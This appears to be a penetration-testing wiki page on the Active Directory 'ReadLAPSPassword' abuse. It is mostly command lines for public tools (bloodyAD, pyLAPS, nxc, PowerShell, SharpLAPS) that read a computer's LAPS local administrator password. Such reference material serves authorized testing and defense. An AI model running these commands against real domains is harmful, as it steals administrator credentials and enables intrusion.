ReadLAPSPassword

Last updated 10 months ago

Was this helpful?

ReadLAPSPassword

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or combination of GetChanges and (GetChangesInFilteredSet or GetChangesAll) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).

Alternative #1: Using

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Alternative #2: (Python)

pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101

Alternative #3: also has this ability. In case it doesn't work for CrackMapExec could also be used.

# Default command
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps

# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"

Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.

Alternative #4: is another Python alternative.

Alternative #1: TheActive Directory PowerShell module.

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Alternative #2: The powershell module from PowerSploit.

Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

Alternative #3: (C#) automates the process.

SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

Last updated 10 months ago

Was this helpful?